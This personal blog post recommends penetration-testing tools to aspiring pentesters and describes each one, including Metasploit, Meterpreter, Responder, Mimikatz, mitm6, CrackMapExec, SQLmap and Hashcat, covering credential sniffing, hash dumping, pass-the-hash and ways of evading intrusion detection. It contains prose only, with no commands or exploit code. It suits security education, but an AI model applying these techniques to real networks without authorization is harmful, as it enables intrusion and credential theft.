The official blog belonging to Anthony Kwok
To all future pentesters out there, this is the current suite of tools I use and have familiarity with.
Note: This list is not all inclusive (no Hak5 tools in this list). I recommend knowing how these tools work and being able to work the ins and outs of each tool. Proficiency comes from practice and use. The more familiar you become with these tools, the easier it'll be for you down the line in your hacking or pentesting career. I currently do not have any Hak5 tools although I do plan on acquiring a full Hak5 set in the future. I highly recommend you are familiar with command line. I will be writing a future post on a tutorial for Linux command line and resources that helped me develop command line proficiency. I also recommend having sufficient knowledge in networking, primarily understanding the OSI Model and understanding TCP/IP, UDP, and subnets. All tools in this list are what I actually use when I conduct a pentest, although some tools I use more frequently than others.
Let's Get Down to It. In No Particular Order
1. Kali Linux
I currently use Kali Linux build 2019.3. I do not like the new GUI in build 2019.4 and later. Kali Linux is nice because it includes a plethora of tools and it all comes in the distro, meaning you do not have to download more tools. The biggest downside is that it's a bit overwhelming for first time users. It is not an intuitive distro and despite it having a GUI, you will be spending most of your time in the terminal. All tools in this list are built into Kali Linux unless otherwise stated. I have integrated all of these tools in my Kali Linux VM and I suggest you do the same. Download links are in the headers.
2. Burp Suite
Burp Suite is an integrated platform for performing security testing of web applications. Its various tools work seamlessly together to support the entire testing process, from initial mapping and analysis of an application's attack surface, through to finding and exploiting security vulnerabilities. I use this when I'm serious about testing web apps. The community version (free version) is native to Kali but the professional license, which is priced at $399 per year is a bit costly for the entry pentester. Although if you're primarily going to be a web pentester, I strongly recommend paying for the full version.
Nessus is the commercial version of OpenVAS (Open Vulnerability Assessment Scanner). You can get a free license which allows scanning of 16 IP addresses by registering for Nessus Essentials or set up an OpenVAS environment on your Kali distro which allows scanning of unlimited IP addresses. This framework is capable of scanning machines and reporting vulnerabilities about that machine. It's a must have to make your life a lot easier and conduct efficient pentests. This tool is not native to Kali and you have to register a license and then download it via dkpg.
Metasploit is a framework that provides information about security vulnerabilities and aids in pentesting by giving you scripts that allow you to scan or exploit these security vulnerabilities. I use Metasploit constantly. It's very robust and versatile. Knowing the ins and outs of this framework is a must for any offensive security professional. I mainly use this for exploits, enumeration, and scanning.
Nmap, aka network mapper, is a tool that allows you to conduct network scans against IP addresses or subnets (range of IP addresses). This tool will allow you to target specific machines and gather external information such as the ports that are open, what services are running on that port, and what machine is hosting that service. It is a very useful tool to detect what hosts are there since it is possible to block ICMP requests so pinging the machine would result in unuseful data.
Aircrack is the one stop shop to break WiFi. It is a complete suite of tools to assess WiFi network security. It focuses on different areas of WiFi security: 1. Monitoring: Packet capture and export of data to text files for further processing by third party tools 2. Attacking: Replay attacks, deauthentication, fake access points and others via packet injection 3. Testing: Checking WiFi cards and driver capabilities (capture and injection) 4. Cracking: WEP and WPA PSK (WPA 1 and 2) All tools are command line which allows for heavy scripting.
7. Cherry Tree
A hierarchical note taking application, featuring rich text and syntax highlighting, storing data in a single xml or sqlite file. This is what I use to take notes. It allows me to log data down and proper notekeeping is important when you're reporting bugs or vulnerabilities to the system maintainer(s).
Wireshark is a free and open-source packet analyzer. It is used for network troubleshooting, analysis, software and communications protocol development, and education It is used to capture network traffic along your network device. I use it to capture traffic going to and from a device or machine primarily for the intent of password sniffing. It is a must have in a pentester's arsenal.
Nikto is an Open Source web server scanner which performs comprehensive tests against web servers for multiple items, including over 6700 potentially dangerous files/programs, checks for outdated versions of servers, and version specific problems on web servers. It also checks for server configuration items such as the presence of multiple index files, HTTP server options, and will attempt to identify installed web servers and software. Scan items and plugins are frequently updated and can be automatically updated. However, Nikto is not designed as a stealthy tool. It will test a web server in the quickest time possible, and is obvious in log files or to an IPS/IDS. However, there is support for LibWhisker’s anti-IDS methods in case you want to give it a try (or test your IDS system). Not every check is a security problem, though most are. There are some items that are “info only” type checks that look for things that may not have a security flaw, but the webmaster or security engineer may not know are present on the server. These items are usually marked appropriately in the information printed. There are also some checks for unknown items which have been seen scanned for in log files. Overall, this tool is really great for actively scanning and attacking webservers.
CrackMapExec (a.k.a CME) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks. Built with stealth in mind, CME follows the concept of "Living off the Land": abusing built-in Active Directory features/protocols to achieve it's functionality and allowing it to evade most endpoint protection/IDS/IPS solutions. Although meant to be used primarily for offensive purposes (e.g. red teams), CME can be used by blue teams as well to assess account privileges, find possible misconfigurations and simulate attack scenarios. Primarily used to conduct pass the hash attacks in Windows AD environments. This tool is not built into Kali by default (at least in the build I am using).
Bloodhound is an open source application used for analyzing security of active directory domains. The tool is inspired by graph theory and active directory object permissions. The tool performs data ingestion from Active Directory domains and highlights the potential for escalation of rights in Active Directory domains, thus uncovering hidden or complex attack paths that can compromise security of a network. I will have a future blog post on how to set up and use Bloodhound to find domain admins in Active Directory. Not native to Kali, you can download it
12. Cobalt Strike
Cobalt Strike is threat emulation software. Execute targeted attacks against modern enterprises with one of the most powerful network attack kits available to penetration testers. This is not compliance testing. Cobalt Strike's system profiler discovers which client-side applications your target uses, with version information. I personally do not use this tool often since it costs a lot and you can actually do solid pentesting without it however, many pentesting companies do use cobalt strike in their arsenal, which is why this tool made it on my list. Not native to Kali
This is the payload inside of Metasploit. Metasploit as a framework comes with a lot of tools but the tool used for exploiting vulnerabilities is called meterpreter. Meterpreter allows an attacker to control a victim’s computer by running an invisible shell and establishing a communication channel back to the attacking machine. Its power and versatility have made it a favorite among pentesters, and clearly these qualities have made it equally attractive to bad actors. Meterpreter has all the “basic” features one would expect from a penetration testing tool. These include access to a command shell, running executables, sending and receiving files and profiling the network. However it can do much more than that. Taking screenshots, keylogging, port forwarding and privilege escalation are only a few of its capabilities. Moreover, it can load various in-memory modules such as Mimikatz for dumping hashes and plaintext passwords. Meterpreter itself resides entirely in memory, writes nothing to disk, and creates no new processes. Instead, it injects itself into compromised processes and can also migrate from one to another as necessary. These features make it an attractive payload for APTs that prioritize staying under the radar. This is another must have tool in a hacker/pentester's arsenal.
This tool is first an LLMNR and NBT-NS responder, it will answer to *specific* NBT-NS (NetBIOS Name Service) queries based on their name suffix (see: http://support.microsoft.com/kb/163409). By default, the tool will only answers to File Server Service request, which is for SMB. The concept behind this, is to target our answers, and be stealthier on the network. This also helps to ensure that we don’t break legitimate NBT-NS behavior. You can set the -r option to 1 via command line if you want this tool to answer to the Workstation Service request name suffix. Responder is a powerful tool for quickly gaining credentials and possibly even remote system access. It is a LLMNR, NBT-NS & MDNS poisoner that is easy to use and very effective against vulnerable networks. Responder works by imitating several services and offering them to the network. Once a Windows system is tricked into communicating to responder via one of these services or when an incorrect UNC share name is searched for on the LAN, responder will respond to the request, grab the username & password hash and log them. Responder has the ability to prompt users for credentials when certain network services are requested, resulting in clear text passwords. It can also perform pass-the-hash style attacks and provide remote shells. It is design to target Active Directory. I will also have a future blog post on how to use Responder on its own and then combining it with Bloodhound to show you how to pwn/own AD.
Another great tool to attack Active Directory. Especialliy Kerberoasting. Mimikatz is a leading post-exploitation tool that dumps passwords from memory, as well as hashes, PINs and Kerberos tickets. Other useful attacks it enables are pass-the-hash, pass-the-ticket or building Golden Kerberos tickets. This makes post-exploitation lateral movement within a network easy for attackers. An essential tool for privilege escalation in Windows environments
Hunter is the leading solution to find and verify professional email addresses. Primarily used for email addresses and username enumeration. Very handy tool to see the nomenclature of usernames of a company or organization and a tool I often use when conducting OSINT.
Man in the Middle IPv6. One of my personal favorites since IPv6 isn't as mainstream as IPv4. However, oddly enough most organizations only have firewall rules protecting them from IPv4 addresses. (BHR ACLs have to have both IPv4 and IPv6 address in order to block the machine entirely). Sure in Linux, it is a one line command to disable IPv6 but most people do not type that command. Mitm6 is a pentesting tool that exploits the default configuration of Windows to take over the default DNS server. It does this by replying to DHCPv6 messages, providing victims with a link-local IPv6 address and setting the attackers host as default DNS server. As DNS server, mitm6 will selectively reply to DNS queries of the attackers choosing and redirect the victims traffic to the attacker machine instead of the legitimate server. For a full explanation of the attack, see the blog post about mitm6. Mitm6 is designed to work together with ntlmrelayx from impacket for WPAD (Windows Proxy Auto Discovery) spoofing and credential relaying. Not native to Kali, please install by going to the link.
SQLmap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of database servers. It comes with a powerful detection engine, many niche features for the ultimate penetration tester and a broad range of switches lasting from database fingerprinting, over data fetching from the database, to accessing the underlying file system and executing commands on the operating system via out-of-band connections. Nothing more to it. This tool solely can give a pentester the power to become a backend developer's worse nightmare.
19. John the Ripper
John the Ripper is a fast password cracker, currently available for many flavors of Unix, macOS, Windows, DOS, BeOS, and OpenVMS (the latter requires a contributed patch). Its primary purpose is to detect weak Unix passwords. Besides several crypt(3) password hash types most commonly found on various Unix flavors, supported out of the box are Kerberos/AFS and Windows LM hashes, as well as DES-based tripcodes, plus hundreds of additional hashes and ciphers in "-jumbo" versions. This is designed to decimate weak passwords, whereas Hashcat is designed to annihilate complex passwords. I recommend using John for passwords that are between 1-8 characters and use Hashcat for passwords longer than 8 characters.
20. OSINT Framework
OSINT framework focused on gathering information from free tools or resources. The intention is to help people find free OSINT resources. Some of the sites included might require registration or offer more data for $$$, but you should be able to get at least a portion of the available information for no cost. This framekwork was originally created with an information security point of view. Since then, the response from other fields and disciplines has been incredible. This is a collection of tools to conduct information gathering and reconnaissance
The Social-Engineer Toolkit (SET) is specifically designed to perform advanced attacks against the human element. This tool is standard issue in a pentester's arsenal. SET was written by David Kennedy (ReL1K) and with a lot of help from the community it has incorporated attacks never before seen in an exploitation toolset. The attacks built into the toolkit are designed to be targeted and focused attacks against a person or organization used during a penetration test.
Bluto now does email address enumeration based on the target domain, currently using Bing and Google search engines plus gathering data from the Email Hunter service and LinkedIn. https://haveibeenpwned.com/ is then used to identify if any email addresses have been compromised. Search engine queries are configured in such a way to use a random User Agent: on each request and does a country look up to select the fastest Google server in relation to your egress address. Each request closes the connection in an attempt to further avoid captchas, however exsesive lookups will result in captchas (Bluto will warn you if any are identified).
Shodan is a search engine that lets the user find specific types of computers connected to the internet using a variety of filters. Some have also described it as a search engine of service banners, which are metadata that the server sends back to the client. Shodan allows you to search for exposed or vulnerable machines. I frequently check my own machines against shodan to make sure none of my home servers are on it.
DirBuster is a multi threaded java application designed to brute force directories and files names on web/application servers. Often is the case now of what looks like a web server in a state of default installation is actually not, and has pages and applications hidden within. DirBuster attempts to find these. However tools of this nature are often as only good as the directory and file list they come with. A different approach was taken to generating this. The list was generated from scratch, by crawling the Internet and collecting the directory and files that are actually used by developers! DirBuster comes a total of 9 different lists, this makes DirBuster extremely effective at finding those hidden files and directories. And if that was not enough DirBuster also has the option to perform a pure brute force, which leaves the hidden directories and files nowhere to hide.
Hashcat is the world's fastest and most advanced password recovery utility, supporting five unique modes of attack for over 300 highly-optimized hashing algorithms. Hashcat currently supports CPUs, GPUs, and other hardware accelerators on Linux, Windows, and macOS, and has facilities to help enable distributed password cracking. It's a password cracker's dream. Password representations are primarily associated with hash keys, such as MD5, SHA, WHIRLPOOL, RipeMD, etc. They are also defined as a one-way function, which is a mathematical operation that is easy to perform, but very difficult to reverse engineer. Hashcat turns readable data into a garbled state (this is a random string of fixed length size). Hashes do not allow someone to decrypt data with a specific key, as standard encryption protocols allow. Hashcat uses precomputed dictionaries, rainbow tables, and even a brute-force approach to find an effective and efficient way crack passwords.
theHarvester is a very simple to use, yet powerful and effective tool designed to be used in the early statges of a penetration test or red team engagement. Use it for open source intelligence (OSINT) gathering to help determine a company's external threat landscape on the internet. The objective of this program is to gather emails, subdomains, hosts, employee names, open ports and banners from different public sources like search engines, PGP key servers and SHODAN computer database. This tool is intended to help Penetration testers in the early stages of the penetration test in order to understand the customer footprint on the Internet. It is also useful for anyone that wants to know what an attacker can see about their organization.
I highly recommend proficiency in Python since a lot of scripting can be written in Python. If you want more versatility than bash but still run effective and powerful scripts, Python is the way to go.
I want to give a huge shoutout to TheCyberMentor (Heath Adams) for being the Richard Stallman of Cyber Security. I started my offensive security path with his Zero to Hero course. Happy Hacking. If there are any tools that aren't on this list that should be (excluding Hak5), please DM me on my socials and I'll correct it if I see fit.